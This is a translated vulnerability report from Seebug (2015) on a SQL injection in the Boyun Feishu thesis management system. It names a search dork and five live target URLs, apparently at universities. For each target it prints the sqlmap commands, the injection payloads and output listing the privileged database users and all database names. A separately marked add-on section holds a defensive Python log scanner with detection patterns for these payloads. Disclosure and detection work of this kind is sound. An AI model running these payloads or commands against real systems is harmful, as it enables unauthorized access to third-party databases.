Generic SQL injection in the 博云非书 (Boyun Feishu) thesis management system

2015-01-19T00:00:00
ID SSV:95708
Type seebug
Reporter Root
Modified 2015-01-19T00:00:00

Description

Brief description:

The thesis management system has a generic SQL injection (the same flaw is present in every deployment of the product).

Detailed description:

Injection points: the dbid and docid GET parameters of /docinfo.action. Search keyword: inurl:/docinfo.action?dbid=

[Screenshot 1.png: https://images.seebug.org/upload/201501/14143342fcf43465308f6bc3497cfd0583701857.png]

http://202.195.136.150/docinfo.action?dbid=72&docid=40824
http://202.199.163.37/docinfo.action?dbid=72&docid=40619
http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793
http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927
http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517

1) http://202.195.136.150/docinfo.action?dbid=72&docid=40824

sqlmap.py -u "http://202.195.136.150/docinfo.action?dbid=72&docid=40824" -p "dbid" --dbs --current-user --current-db

sqlmap identified the following injection points with a total of 61 HTTP(s) requests:


Place: GET
Parameter: dbid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dbid=72 AND 9888=9888&docid=40824

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40824

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40824


[17:25:15] [INFO] testing MySQL
[17:25:32] [WARNING] the back-end DBMS is not MySQL
[17:25:32] [INFO] testing Oracle
[17:25:49] [WARNING] the back-end DBMS is not Oracle
[17:25:49] [INFO] testing PostgreSQL
[17:26:06] [WARNING] the back-end DBMS is not PostgreSQL
[17:26:06] [INFO] testing Microsoft SQL Server
[17:26:23] [INFO] confirming Microsoft SQL Server
[17:27:15] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[17:27:15] [INFO] fetching current user
[17:27:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:27:15] [INFO] retrieved:
[17:29:12] [INFO] retrieved:
[17:29:12] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries sa
current user: 'sa'
[17:36:12] [INFO] fetching current database
[17:36:12] [INFO] retrieved:
[17:38:10] [INFO] retrieved: etd4
current database: 'etd4'
[17:50:28] [INFO] fetching database names
[17:50:28] [INFO] fetching number of databases
[17:50:28] [INFO] retrieved:
[17:51:19] [INFO] retrieved: 7
[17:53:44] [INFO] retrieved:
[17:55:41] [INFO] retrieved: etd4
[18:07:59] [INFO] retrieved:
[18:09:57] [INFO] retrieved: etd4new
[18:30:04] [INFO] retrieved:
[18:32:01] [INFO] retrieved: idl
[18:41:45] [INFO] retrieved:
[18:43:44] [INFO] retrieved: master
[19:01:04] [INFO] retrieved:
[19:03:01] [INFO] retrieved: model
[19:18:02] [INFO] retrieved:
[19:20:01] [INFO] retrieved: msdb
[19:32:17] [INFO] retrieved:
[19:34:15] [INFO] retrieved: temp
[19:47:23] [ERROR] invalid character detected. retrying..
[19:47:23] [WARNING] increasing time delay to 6 seconds db
available databases [7]:
[*] etd4
[*] etd4new
[*] idl
[*] master
[*] model
[*] msdb
[*] tempdb

2) http://202.199.163.37/docinfo.action?dbid=72&docid=40619

sqlmap.py -u "http://202.199.163.37/docinfo.action?dbid=72&docid=40619" -p "dbid" --dbs --current-user --current-db

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: GET
Parameter: dbid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dbid=72 AND 4908=4908&docid=40619

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40619

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40619


[09:45:41] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[09:45:41] [INFO] fetching current user
[09:45:41] [INFO] resumed: sa
current user: 'sa'
[09:45:41] [INFO] fetching current database
[09:45:41] [INFO] resumed: etd
current database: 'etd'
[09:45:41] [INFO] fetching database names
[09:45:41] [INFO] fetching number of databases
[09:45:41] [INFO] resumed: 5
[09:45:41] [INFO] resumed: etd
[09:45:41] [INFO] resumed: master
[09:45:41] [INFO] resumed: model
[09:45:41] [INFO] resumed: msdb
[09:45:41] [INFO] resumed: tempdb
available databases [5]:
[*] etd
[*] master
[*] model
[*] msdb
[*] tempdb

3) http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793

sqlmap.py -u "http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793" -p "dbid" --dbs --current-user --current-db

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: GET
Parameter: dbid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dbid=72 AND 1458=1458&docid=5793

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=5793

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=5793


[13:58:21] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:58:21] [INFO] fetching current user
[13:58:21] [INFO] resumed: sa
current user: 'sa'
[13:58:21] [INFO] fetching current database
[13:58:21] [INFO] resumed: etd
current database: 'etd'
[13:58:21] [INFO] fetching database names
[13:58:21] [INFO] fetching number of databases
[13:58:21] [INFO] resumed: 10
[13:58:21] [INFO] resumed: etd
[13:58:21] [INFO] resumed: lunwen
[13:58:21] [INFO] resumed: master
[13:58:21] [INFO] resumed: model
[13:58:21] [INFO] resumed: msdb
[13:58:21] [INFO] resumed: ReportServer
[13:58:21] [INFO] resumed: ReportServerTempDB
[13:58:21] [INFO] resumed: tempdb
[13:58:21] [INFO] resumed: test
[13:58:21] [INFO] resumed: tsk
available databases [10]:
[*] etd
[*] lunwen
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] tsk

4) http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927

sqlmap.py -u "http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927" -p "dbid" --dbs --current-user --current-db

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: GET
Parameter: dbid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dbid=72 AND 7461=7461&docid=13927

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=13927

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=13927


[11:41:58] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[11:41:58] [INFO] fetching current user
[11:41:58] [INFO] resumed: etd
current user: 'etd'
[11:41:58] [INFO] fetching current database
[11:41:58] [INFO] resumed: etd4
current database: 'etd4'
[11:41:58] [INFO] fetching database names
[11:41:58] [INFO] fetching number of databases
[11:41:58] [INFO] resumed: 9
[11:41:58] [INFO] resumed: chek
[11:41:58] [INFO] resumed: etd4
[11:41:58] [INFO] resumed: idl30
[11:41:58] [INFO] resumed: master
[11:41:58] [INFO] resumed: model
[11:41:58] [INFO] resumed: msdb
[11:41:58] [INFO] resumed: ReportServer$LIB
[11:41:58] [INFO] resumed: ReportServer$LIBTempDB
[11:41:58] [INFO] resumed: tempdb
available databases [9]:
[*] chek
[*] etd4
[*] idl30
[*] master
[*] model
[*] msdb
[*] ReportServer$LIB
[*] ReportServer$LIBTempDB
[*] tempdb

5) http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517

sqlmap.py -u "http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517" -p "dbid" --dbs --current-user --current-db

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: GET
Parameter: dbid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dbid=72 AND 1334=1334&docid=62517

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=62517

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=62517


[13:59:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:59:22] [INFO] fetching current user
[13:59:22] [INFO] resumed: sa
current user: 'sa'
[13:59:22] [INFO] fetching current database
[13:59:22] [INFO] resumed: etd
current database: 'etd'
[13:59:22] [INFO] fetching database names
[13:59:22] [INFO] fetching number of databases
[13:59:22] [INFO] resumed: 7
[13:59:22] [INFO] resumed: etd
[13:59:22] [INFO] resumed: idl30
[13:59:22] [INFO] resumed: idl30oooo
[13:59:22] [INFO] resumed: master
[13:59:22] [INFO] resumed: model
[13:59:22] [INFO] resumed: msdb
[13:59:22] [INFO] resumed: tempdb
available databases [7]:
[*] etd
[*] idl30
[*] idl30oooo
[*] master
[*] model
[*] msdb
[*] tempdb
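Defensive counterpart to the probes recorded above, added here as an example and not part of the advisory or of the vendor's code: dbid and docid are numeric record ids, so a patched /docinfo.action should apply a strict integer allow-list (and a parameterized query) before the values reach SQL Server, and the same allow-list applied to web access logs surfaces the boolean-based, stacked-query and time-based probes sqlmap sent. The log lines, client IPs and user agents are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed Combined-Log-Format lines modelled on the payloads sqlmap reported against
# /docinfo.action in this advisory; the client IPs and user agents are invented.
SAMPLE_LOG = r"""
10.0.0.7 - - [19/Jan/2015:17:25:10 +0800] "GET /docinfo.action?dbid=72&docid=40824 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Jan/2015:17:25:15 +0800] "GET /docinfo.action?dbid=72%20AND%209888%3D9888&docid=40824 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
10.0.0.7 - - [19/Jan/2015:17:26:02 +0800] "GET /docinfo.action?dbid=72%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--&docid=40824 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
10.0.0.7 - - [19/Jan/2015:17:26:09 +0800] "GET /docinfo.action?dbid=72%20WAITFOR%20DELAY%20%270%3A0%3A5%27--&docid=40824 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
10.0.0.9 - - [19/Jan/2015:17:30:00 +0800] "GET /index.action HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*"')
ID_PARAMS = ("dbid", "docid")           # both are numeric record ids in the application
NUMERIC_ID = re.compile(r"^\d{1,10}$")  # the only shape the endpoint should ever accept
# The three technique families sqlmap used in the advisory, most specific first.
SIGNATURES = (
    ("stacked-queries", re.compile(r";\s*waitfor\s+delay", re.I)),
    ("time-based-blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("boolean-based-blind", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
)

def is_numeric_id(value: str) -> bool:
    """Allow-list check the endpoint should apply before the value reaches SQL."""
    return bool(NUMERIC_ID.match(value))

def classify(value: str) -> str:
    """Name the injection technique a rejected value resembles."""
    for name, pattern in SIGNATURES:
        if pattern.search(value):
            return name
    return "non-numeric-id"

def scan_log(text: str) -> list[dict]:
    """One finding per /docinfo.action request whose id parameters are not plain integers."""
    findings = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/docinfo.action":
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes once
        for name in ID_PARAMS:
            for value in params.get(name, []):
                if not is_numeric_id(value):
                    findings.append({"ip": m.group("ip"), "time": m.group("ts"), "param": name,
                                     "value": value, "technique": classify(value)})
    return findings
```

Because the check is an allow-list on the expected integer form, any non-numeric value is flagged even when it matches none of the three signatures, so encoding variants that evade the signatures still produce a finding.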

Proof of vulnerability:

Proven above.